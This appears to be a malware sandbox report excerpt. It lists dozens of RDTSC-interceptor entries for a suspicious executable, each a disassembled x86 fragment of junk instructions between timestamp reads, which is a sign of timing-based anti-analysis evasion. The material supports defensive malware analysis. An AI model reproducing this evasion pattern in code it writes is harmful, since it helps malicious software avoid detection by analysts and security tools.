Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ACFC8B second address: ACFC92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ACFEBC second address: ACFF39 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD5E9559C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e mov esi, ebx 0x00000010 push 00000000h 0x00000012 jg 00007FD5E9559C7Ch 0x00000018 and ecx, dword ptr [ebp+122D31C8h] 0x0000001e call 00007FD5E9559C79h 0x00000023 pushad 0x00000024 jmp 00007FD5E9559C7Eh 0x00000029 jnl 00007FD5E9559C7Ch 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007FD5E9559C88h 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a jmp 00007FD5E9559C7Dh 0x0000003f mov eax, dword ptr [eax] 0x00000041 je 00007FD5E9559C82h 0x00000047 jng 00007FD5E9559C7Ch 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ACFF39 second address: ACFF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp+04h], eax 0x00000008 jno 00007FD5E912D9EAh 0x0000000e pop eax 0x0000000f jmp 00007FD5E912D9F6h 0x00000014 push 00000003h 0x00000016 mov ecx, dword ptr [ebp+122D2994h] 0x0000001c push 00000000h 0x0000001e mov edi, 0E98C394h 0x00000023 mov dword ptr [ebp+122D2E4Bh], esi 0x00000029 push 00000003h 0x0000002b push A5DC1C8Ch 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 jc 00007FD5E912D9E6h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AD0091 second address: AD00A9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD5E9559C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD5E9559C7Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AD00A9 second address: AD00AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AD00AF second address: AD00C5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD5E9559C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AD00C5 second address: AD00D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AD00D2 second address: AD00D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AD00D6 second address: AD015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD5E912D9ECh 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 ja 00007FD5E912D9E6h 0x00000019 pop eax 0x0000001a pop ecx 0x0000001b pop eax 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FD5E912D9E8h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 je 00007FD5E912D9ECh 0x0000003e mov dword ptr [ebp+122D31BDh], edx 0x00000044 push 00000000h 0x00000046 mov dword ptr [ebp+122D228Ah], eax 0x0000004c push 00000003h 0x0000004e call 00007FD5E912D9F4h 0x00000053 jc 00007FD5E912D9ECh 0x00000059 jnc 00007FD5E912D9E6h 0x0000005f pop edx 0x00000060 call 00007FD5E912D9E9h 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AD015F second address: AD0191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD5E9559C87h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AD0191 second address: AD01B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AD01B5 second address: AD01DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD5E9559C83h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FD5E9559C76h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AE0E4B second address: AE0E5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AE0E5B second address: AE0E87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jg 00007FD5E9559C78h 0x00000011 push edx 0x00000012 pop edx 0x00000013 jo 00007FD5E9559C7Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AF0A7D second address: AF0A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ABCDA5 second address: ABCDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FD5E9559C7Ch 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ABCDB8 second address: ABCDD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD5E912D9F7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: ABCDD4 second address: ABCDED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD5E9559C83h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEE8C6 second address: AEE8CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEEB71 second address: AEEB75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEEB75 second address: AEEB79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEEB79 second address: AEEB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD5E9559C88h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEEB99 second address: AEEBA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEF046 second address: AEF065 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007FD5E9559C76h 0x00000011 pop eax 0x00000012 jmp 00007FD5E9559C7Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEF37F second address: AEF3AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007FD5E912D9EEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEF3AC second address: AEF3B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEF3B1 second address: AEF3C1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD5E912D9F2h 0x00000008 jno 00007FD5E912D9E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEF3C1 second address: AEF3CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEF3CE second address: AEF3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jbe 00007FD5E912DA18h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEF3DE second address: AEF403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD5E9559C76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD5E9559C86h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEF690 second address: AEF6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FD5E912D9FBh 0x0000000d jmp 00007FD5E912D9F5h 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEF98B second address: AEF9DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C87h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FD5E9559C8Ah 0x00000014 push esi 0x00000015 jmp 00007FD5E9559C85h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEF9DC second address: AEF9F4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD5E912D9E8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FD5E912D9E6h 0x00000012 jl 00007FD5E912D9E6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AEFB6B second address: AEFB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD5E9559C7Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AF3E4B second address: AF3E63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD5E912D9EDh 0x00000008 jl 00007FD5E912D9E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AF3E63 second address: AF3E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FD5E9559C7Eh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AF3E72 second address: AF3E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AF3E7E second address: AF3E93 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD5E9559C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD5E9559C7Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AF784D second address: AF7853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AF6968 second address: AF696E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AF696E second address: AF6987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FD5E912D9E8h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FD5E912D9E6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AF6987 second address: AF6991 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD5E9559C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AF7A71 second address: AF7A9B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD5E912D9E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 jmp 00007FD5E912D9F6h 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AF7A9B second address: AF7ACA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD5E9559C7Ch 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007FD5E9559C7Dh 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 js 00007FD5E9559C80h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AF7BC7 second address: AF7BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AF7BCB second address: AF7BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFABEA second address: AFABEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFABEE second address: AFAC0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007FD5E9559C76h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jne 00007FD5E9559C76h 0x00000017 popad 0x00000018 push ecx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFAC0A second address: AFAC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFAEF7 second address: AFAF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 jo 00007FD5E9559C82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFAF06 second address: AFAF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFAF0C second address: AFAF14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB075 second address: AFB09C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD5E912D9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007FD5E912D9F2h 0x00000010 pop edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB09C second address: AFB0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB0A0 second address: AFB0BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FD5E912D9F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB0BC second address: AFB0C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB4B3 second address: AFB4BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB4BF second address: AFB4C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD5E9559C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB4C9 second address: AFB4CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB4CD second address: AFB4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB5F4 second address: AFB5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB5FA second address: AFB60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD5E9559C7Eh 0x0000000a jg 00007FD5E9559C76h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE2BF second address: AFE2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE2C3 second address: AFE2D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE2D8 second address: AFE2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE2E4 second address: AFE2E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE2E9 second address: AFE2EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE2EE second address: AFE2F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE348 second address: AFE367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 pushad 0x0000000a jl 00007FD5E912D9F2h 0x00000010 jmp 00007FD5E912D9ECh 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE367 second address: AFE386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FD5E9559C7Ah 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FD5E9559C76h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE386 second address: AFE38A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE38A second address: AFE393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE8CA second address: AFE8D4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD5E912D9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE8D4 second address: AFE8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE8DA second address: AFE8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFEF6C second address: AFEF8D instructions: 0x00000000 rdtsc 0x00000002 js 00007FD5E9559C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD5E9559C83h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFEF8D second address: AFEF9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E912D9EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFEF9E second address: AFEFA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFF28B second address: AFF2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD5E912D9F2h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFF2AA second address: AFF2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFF2AE second address: AFF2BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFF2BF second address: AFF2C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FD5E9559C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFF2C9 second address: AFF2CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFF5F3 second address: AFF5F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
